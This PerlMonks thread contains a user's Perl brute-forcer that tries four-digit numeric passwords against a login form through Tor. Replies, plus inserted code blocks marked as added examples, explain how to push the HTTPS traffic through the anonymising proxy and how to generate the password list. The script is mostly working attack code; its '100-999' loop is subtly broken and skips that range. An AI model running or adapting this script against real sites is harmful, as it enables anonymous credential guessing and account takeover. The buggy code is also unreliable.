PerlMonks  
Using Mech with HTTPS

by Juno (Initiate)
on Feb 05, 2009 at 17:43 UTC
Juno has asked for the wisdom of the Perl Monks concerning the following question:

Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation (or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999 (I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, i.e., no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine on my web browser, but not with my script. That brings me to my...

PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW::Mechanize. HTTP connections appear to correctly filter through the proxy. The proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.

SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt::SSLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated. CODE:

#!/usr/bin/perl
#Thanks to IBM for helping to create this - Bret Sweeden especially
#NBTDOTM
use WWW::Mechanize;
use HTTP::Cookies;

#$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
#$ENV{HTTP_PROXY}  = '127.0.0.1:8118';

#Determine the number of arguments the user has given us
$NumArgs = $#ARGV + 1;
if ($NumArgs == 0) {
    #Our user has not entered any information. Display help screen.
    header();
    exit();
}
elsif ($NumArgs == 1) {
    #Our user has only entered some information. Display help screen.
    header();
    exit();
}
if ($NumArgs == 2) {
    #Our user has entered enough for an attack. Begin!
    $host = $ARGV[0];    #Host is the first argument supplied
    $user = $ARGV[1];    #Username is the 2nd argument supplied

    #Display header
    print qq{
----------------------------------------------------------------------
Login Brute-Forcer Custom Built by Juno NBTDOTM
----------------------------------------------------------------------
};
    print "\nYour host is: $host";
    print "\nYour username is: $user";
    print "\n\nThe program will now try bruteforcing the host you selected";

    my $url      = $host;
    my $username = $user;

    #1-9
    for $i (1 .. 9) {
        print "\nTrying password 000$i...";
        my $outfile  = "000" . $i . ".htm";
        my $password = "000" . $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https://127.0.0.1:8118/');
        $mech->get($url);
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }

    #10-99
    for $i (10 .. 99) {
        print "\nTrying password 00$i...";
        my $outfile  = "00" . $i . ".htm";
        my $password = "00" . $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->get($url);
        #$mech->form_name('j');
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }

    #100-999
    for $i (1 .. 9) {
        print "\nTrying password 0$i...";
        my $outfile  = "0" . $i . ".htm";
        my $password = "0" . $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->get($url);
        #$mech->form_name('j');
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }

    #1000-9999
    for $i (1000 .. 9999) {
        print "\nTrying password $i...";
        my $outfile  = $i . ".htm";
        my $password = $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->get($url);
        #$mech->form_name('j');
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }
}

print "\n\nAudit complete!";
exit();

sub header {
    print qq{
----------------------------------------------------------------------
Login Brute-Forcer Custom Built by Juno NBTDOTM
----------------------------------------------------------------------
Usage: GHGbrute -[target site] -[user]
Example: GHGbrute somesite.com -admin
The program will attempt a numerical bruteforce to four places.
};
}

Re: Using Mech with HTTPS
by samtregar (Abbot) on Feb 05, 2009 at 18:06 UTC
    WWW::Mechanize has this to say about doing SSL through proxies:

    noproxy => [0|1]
    Turn off the automatic call to the LWP::UserAgent env_proxy function. This needs to be explicitly turned off if you're using Crypt::SSLeay to access a https site via a proxy server. Note: you still need to set your HTTPS_PROXY environment variable as appropriate.

    Did you try that? Just so you know, the nasty hackers you're trying to outsmart - they RTFM!

    -sam
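To make the documented behaviour concrete, here is an added example (written for this page, not taken from the original post or from the WWW::Mechanize distribution) that builds an agent for an HTTPS request through a local HTTP proxy and reports its proxy configuration before sending anything. The proxy address 127.0.0.1:8118 is the one from the question; the target URL in the usage call is a placeholder, and the backend names are labels chosen here. Which path applies depends on the SSL backend: with Crypt::SSLeay the agent must not carry its own https proxy entry (which is exactly what env_proxy would add, so noproxy => 1 suppresses it) because Crypt::SSLeay reads HTTPS_PROXY and opens the tunnel itself; with the IO::Socket::SSL backend used by recent LWP::Protocol::https, the https proxy is registered with proxy() and LWP opens the CONNECT tunnel.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use WWW::Mechanize;

# Added example, not part of the original thread.  The proxy address is
# the one from the question; $backend selects which LWP/SSL code path
# the agent is set up for (names are labels chosen for this example).
my $PROXY = 'http://127.0.0.1:8118/';

sub build_agent {
    my ($backend) = @_;    # 'crypt_ssleay' or 'io_socket_ssl'

    if ($backend eq 'crypt_ssleay') {
        # Crypt::SSLeay reads HTTPS_PROXY itself and tunnels through it.
        # LWP must NOT also hold an https proxy entry, which is what
        # env_proxy() would register; noproxy => 1 suppresses that call.
        $ENV{HTTPS_PROXY} = $PROXY;
        my $mech = WWW::Mechanize->new(noproxy => 1, autocheck => 0);
        $mech->proxy('http', $PROXY);    # plain http still goes via LWP's proxy table
        return $mech;
    }

    # IO::Socket::SSL via LWP::Protocol::https: LWP opens the CONNECT
    # tunnel itself, so https is registered like any other scheme.
    my $mech = WWW::Mechanize->new(noproxy => 1, autocheck => 0);
    $mech->proxy(['http', 'https'], $PROXY);
    return $mech;
}

# Report how the agent will route each scheme, so a request that would
# bypass the proxy is visible before any traffic leaves the host.
sub describe_proxies {
    my ($mech) = @_;
    return {
        http  => $mech->proxy('http'),
        https => $mech->proxy('https'),
        env   => $ENV{HTTPS_PROXY},
    };
}

sub fetch_through_proxy {
    my ($mech, $url) = @_;
    my $resp = $mech->get($url);
    # autocheck is off above, so check the network I/O explicitly.
    die sprintf("GET %s failed: %s\n", $url, $resp->status_line)
        unless $resp->is_success;
    return $resp;
}

unless (caller) {
    my $backend = $ARGV[0] // 'io_socket_ssl';
    my $url     = $ARGV[1] // 'https://example.com/';    # placeholder target
    my $mech    = build_agent($backend);
    my $cfg     = describe_proxies($mech);
    printf "backend=%s http_proxy=%s https_proxy=%s HTTPS_PROXY=%s\n",
        $backend, map { $_ // '(none)' } @{$cfg}{qw(http https env)};
    my $resp = fetch_through_proxy($mech, $url);
    print "fetched ", length($resp->decoded_content), " bytes via proxy\n";
}
```

The describe_proxies check is the useful part for diagnosing the symptom in the question: if the https entry is empty under the IO::Socket::SSL path, or populated under the Crypt::SSLeay path, the request will not go where the proxy capture expects, and that shows up in the agent's configuration before any packet is sent.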

Re: Using Mech with HTTPS
by AnomalousMonk (Abbot) on Feb 05, 2009 at 19:13 UTC
    This does not directly address your question, but I can suggest that, since the bodies of your loops seem very similar if not identical, there is a way to more concisely express the requirement to loop through all passwords from '0000' to '9999' using the sprintf built-in.
    >perl -wMstrict -e "for (0 .. 2, 103 .. 105, 9997 .. 9999) { my $password = sprintf qq{%04d}, $_; print qq{$password } } "
    0000 0001 0002 0103 0104 0105 9997 9998 9999
    You may also, in future, wish to consider enclosing large chunks of code in <readmore> ... </readmore> tags; please see Writeup Formatting Tips for more info. (You can even update your post to do this now!)

    Update: It's also a good idea to check the return status of any file or network I/O operations and die or warn as appropriate.
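Putting both of AnomalousMonk's suggestions together, here is an added example (not from the reply or the original post) that generalizes the sprintf one-liner to an arbitrary width and writes a page to a zero-padded filename with every I/O call checked. The function names, the .htm suffix and the sample content are choices made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Added example, not part of the thread: zero-padded names via sprintf,
# plus explicit status checks on file I/O instead of silent failure.

# Format $n as a fixed-width, zero-padded decimal string; $width is the
# number of digits (4 gives '0000' .. '9999').  Inputs that would not
# fit are rejected rather than silently widened.
sub padded {
    my ($n, $width) = @_;
    die "width must be positive\n" unless $width > 0;
    die "$n does not fit in $width digits\n" if length($n) > $width;
    return sprintf('%0*d', $width, $n);
}

# Write $content to $dir/<padded n>.htm and return the path.  Three-arg
# open with a lexical handle; open, print and close are each checked
# and reported with $! so a full disk or bad directory is not ignored.
sub save_page {
    my ($dir, $n, $content) = @_;
    my $path = "$dir/" . padded($n, 4) . '.htm';
    open(my $fh, '>', $path) or die "Cannot open $path for writing: $!\n";
    print {$fh} $content     or die "Cannot write to $path: $!\n";
    close($fh)               or die "Cannot close $path: $!\n";
    return $path;
}

unless (caller) {
    # Same sample range as the one-liner above.
    print join(' ', map { padded($_, 4) } 0 .. 2, 103 .. 105, 9997 .. 9999), "\n";
    my $dir = $ARGV[0] // '.';
    # Constructed sample content, written to ./0007.htm by default.
    print "wrote ", save_page($dir, 7, "<html>constructed sample</html>\n"), "\n";
}
```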
